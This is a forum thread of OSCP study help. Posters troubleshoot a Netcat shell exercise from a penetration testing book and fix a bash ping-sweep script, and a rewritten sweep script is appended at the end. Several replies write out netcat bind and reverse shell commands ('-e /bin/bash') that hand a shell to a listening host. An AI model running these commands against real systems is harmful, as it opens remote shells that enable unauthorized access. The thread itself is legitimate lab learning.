OSCP help - Netcat

McxRisley (OSCP, CASP, CySA+, CPT+, Sec+, CEH, Splunk Admin) Member Posts: 494
Hey guys! I am currently doing some prep study before I sign up for the OSCP and I was wondering if any of you would be able to help me with some issues I am having with Netcat. I am reading and doing the labs in Georgia Weidman's Penetration Testing book and I am unable to get the reverse shell code to work with Netcat. I know that Kali now comes with the OpenBSD version of Netcat which does not have the -e command. So I downloaded the old GNU 0.7.1 version that has the required command. The book calls for the following commands to be entered into the shell.

In the first terminal enter:
nc -lvp 1234 -e /bin/bash

In the second terminal enter:
nc 192.168.20.9 1234

When I enter the second command into the second terminal it gives me the following message:
/bin/bash/ not found: connection reset by peer

and then it closes the connection. Any help or advice on this would be GREATLY appreciated since I have been unable to find any articles or anything about how to fix this issue anywhere.
I'm not allowed to say what my previous occupation was, but let's just say it rhymes with architect.

Comments

  • BlackBeret Member Posts: 684
    I would start by adding -v to the second command; this will increase the verbosity and may give you more of the error message. I'm not on my Kali machine at the moment so I can't test this one, but try running '/bin/bash' locally and see if it runs a shell, and also try '/bin/sh' to see if your default shell is something else.
  • ilikeshells Member Posts: 59
    You are doing a bind shell, not a reverse shell. Have you tried:

    #1: nc -nlvp 5555 # listen for incoming shell
    #2: nc -nv x.x.x.x 5555 -e /bin/bash # send shell.
  • McxRisley (OSCP, CASP, CySA+, CPT+, Sec+, CEH, Splunk Admin) Member Posts: 494
    UPDATE: After doing some research I went home and entered '/bin/sh/' instead of '/bin/bash/' and it worked both ways. My next question is, is 'sh' the same as 'bash'? Also I am now having another issue with a bash script that runs a ping sweep on my local network. The script is:
    #!/bin/bash
    if [ "$1" == "" ]
    then
        echo "Usage: ./pingscript.sh [network]"
        echo "example: ./pingscript.sh 192.168.20"
    else
        for x in `seq 1 254`; do
            ping -c 1 $1.$x
        done
    fi

    The script returns:
    unknown host 192.168.0.seq

    I really appreciate the help guys. I am a newbie to Linux so sorry if these questions seem kinda dumb haha
  • BlackBeret Member Posts: 684
    /bin/sh is a link that points to your default shell. There are different shell programs on Linux; the default is usually bash, but since you were having trouble with it there's no harm in pointing to /bin/sh and letting it redirect you to the default.
  • BlackBeret Member Posts: 684
    That script looks and runs fine in bash. I'm wondering if Kali is using something other than bash by default. Different shells will respond differently.

    If /bin/sh worked on the previous exercise when /bin/bash didn't, type the following into a command prompt:

    ls -alF /bin/sh

    Then look at what /bin/sh is pointing to; this will tell you what your default shell is.
  • McxRisley (OSCP, CASP, CySA+, CPT+, Sec+, CEH, Splunk Admin) Member Posts: 494
    How would I check for that? I know it has to be something with my script because if I use nmap to perform a ping sweep it works just fine.
  • kaizen_404 Member Posts: 16
    McxRisley wrote:
    UPDATE: After doing some research I went home and entered '/bin/sh/' instead of '/bin/bash/' and it worked both ways. My next question is, is 'sh' the same as 'bash'? Also I am now having another issue with a bash script that runs a ping sweep on my local network. The script is:
    #!/bin/bash
    if [ "$1" == "" ]
    then
        echo "Usage: ./pingscript.sh [network]"
        echo "example: ./pingscript.sh 192.168.20"
    else
        for x in `seq 1 254`; do
            ping -c 1 $1.$x
        done
    fi

    The script returns:
    unknown host 192.168.0.seq

    I really appreciate the help guys. I am a newbie to Linux so sorry if these questions seem kinda dumb haha

    There's a slight error in the script. Try this: for x in $(seq 1 254); do
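As an added example (not the script from the thread or from the book), here is the sweep rewritten with `$(seq 1 254)` as kaizen_404 suggests, plus a check that the argument really is a /24 prefix such as 192.168.20; an error like `unknown host 192.168.0.seq` is what you see when `seq` is never actually run and the literal word ends up in the address. The function names `build_targets` and `sweep` are my own, and `ping -W 1` assumes the Linux (iputils) ping.

```shell
#!/bin/sh
# Added example, not the thread's script: the ping sweep with $(seq 1 254)
# plus validation of the /24 prefix argument (e.g. 192.168.20). A full host
# address such as 192.168.20.9 is rejected instead of producing bad targets.

# build_targets PREFIX: print the 254 host addresses PREFIX.1 .. PREFIX.254,
# or return 1 if PREFIX is not three dotted octets in the range 0-255.
# Kept separate from the ping loop so it can be checked without sending traffic.
build_targets() {
    prefix="$1"
    case "$prefix" in
        *[!0-9.]*|"") echo "bad prefix: '$prefix'" >&2; return 1 ;;
    esac
    old_ifs="$IFS"; IFS=.
    set -- $prefix            # split the prefix into its octets
    IFS="$old_ifs"
    if [ $# -ne 3 ]; then
        echo "expected a /24 prefix like 192.168.20, got '$prefix'" >&2
        return 1
    fi
    for octet in "$@"; do
        # an empty field (from "192..168") or a value above 255 fails here
        [ "$octet" -le 255 ] 2>/dev/null || { echo "bad octet '$octet'" >&2; return 1; }
    done
    for x in $(seq 1 254); do # $(...) runs seq; quotes around it would not
        echo "$prefix.$x"
    done
}

# sweep PREFIX: ping each host once with a 1 s timeout and report only the
# hosts that answer. -W is the iputils (Linux) ping timeout flag.
sweep() {
    build_targets "$1" | while read -r host; do
        if ping -c 1 -W 1 "$host" >/dev/null 2>&1; then
            echo "$host is up"
        fi
    done
}

if [ $# -ne 1 ]; then
    echo "Usage: $0 [network]" >&2
    echo "example: $0 192.168.20" >&2
else
    sweep "$1"
fi
```

Run it as `./pingscript.sh 192.168.20` on your own lab network; only hosts that reply to the echo request are printed.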